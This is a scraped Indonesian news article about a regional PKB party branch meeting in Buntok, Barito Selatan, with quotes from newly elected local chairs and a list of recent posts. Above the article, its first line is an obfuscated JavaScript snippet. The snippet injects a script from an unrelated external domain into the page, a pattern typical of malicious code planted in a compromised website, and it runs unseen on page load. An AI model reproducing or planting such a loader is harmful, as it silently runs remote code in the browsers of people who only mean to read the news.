(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Selatan

Muscab PKB Zona III, Ketua Terpilih Optimis Tambah Kursi di Tiap Dapil


KANALKALIMANTAN.COM, BUNTOK– Partai Kebangkitan Bangsa (PKB) Kalimantan Tengah (Kalteng), lewat Zona III yakni Das Barito mencakup 4 kabupaten, menggelar Musyawarah Cabang (Muscab), di di Hotel Afiat Buntok, Kabupaten Barito Selatan, Minggu (14/3/2020).

Muscab digelar sesuai aturan protokol kesehatan dan tiap wilayah dilakukan di tempat berbeda.

Perwakilan dari DPP PKB Febby Dt Bangso mengatakan, mewakili pengurus pusat memimpin Muscab pada Zona III yang terdiri dari wilayah Das Barito yakni, Kabupaten Barito Selatan (Barsel), Barito Timur (Bartim), Barito Utara (Barut), dan Murung Raya.

“Allhamdulillah acara berjalan lancar, dengan semua keputusan yang telah dimusyawarahkan telah mufakat sehingga dapat ditetapkan semua pimpinan wilayah DPC masing-masing di Zona III hari ini,” kata Febby kepada Kanalkalimantan.com, usai kegiatan.

Ditambahkan olehnya, termasuk semua hasil evaluasi kinerja DPC semua peserta musyawarah dapat menerima dengan baik. Di antaranya bersama menyusun kepengurusan baru.

“Artinya semua hal yang dimusyawarahkan dalam Muscab hari ini dapat dimufakatkan bersama. Tinggal menyusun kembali untuk kepengurusannya saja,” ujar Febby.

Ia mengatakan, Ketua Umum PKB berpesan untuk semua jajaran pengurus baik DPD, DPC hingga PAC di Kalteng untuk bisa merangkul semua anggotanya. Sehingga bisa jadi lompatan yang baik ke depannya untuk PKB di Kalteng ini.

“Mari kita rapatkan barisan untuk lebih memperkuat lagi PKB di seluruh wilayah Kalteng,” pinta Febby.

Sementara Ketua terpilih DPC Kabupaten Murung Raya Rahmanto Muhidin menyampaikan terima kasih telah dipercaya kembali menjadi Ketua DPC Murung Raya.

“Allhamdulillah dari 10 DPAC yang hadir dalam Muscab hari dan telah kembali memberikan mandate untuk dipercayanya saya kembali memimpin PKB di Kabupaten Murung Raya,” ungkapnya.

Ia juga mengatakan untuk Muscab tahun ini berbeda dengan yang dulu. Dimana Muscab kali ini semua unsur bisa bergabung dalam partai. Baik unsur agama, suku, adat, budaya, serta akademisi bisa bergabung dalam PKB.

“Semua unsur kita terima untuk dapat membesarkan PKB menuju secara Nasional bisa masuk dalam 3 besar nantinya,” ucap Rahmanto.

Masih di tempat sama, Ketua terpilih PKB Barsel H Supiatma menyampaikan terima kasih atas mandat 6 PAC yang telah memberikan amanah untuk dirinya.

“Tentunya amanah yang akan dipercayakan kepada saya akan dijalankan sebaik mungkin untuk dapat membawa PKB lebih maju lagi dari sebelumnya,” kata H Fiat.

Ia juga berharap dan menargetkan untuk periode akan datang PKB sendiri yang saat ini memiliki 3 kursi di DPRD Barsel, dapat bertambah lagi untuk periode selanjutnya.

“Target kita ke depannya kiranya dapat kembali menambah kursi di DPRD Barsel dari 3 kursi paling tidak menjadi 5 atau 6 kursi,” ujar H Fiat. (kanalkalimantan.com/digdo)

 

Reporter : digdo
Editor : Cell

 

 


Al Ghifari

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

3 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

14 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

16 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

17 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

18 jam ago

This website uses cookies.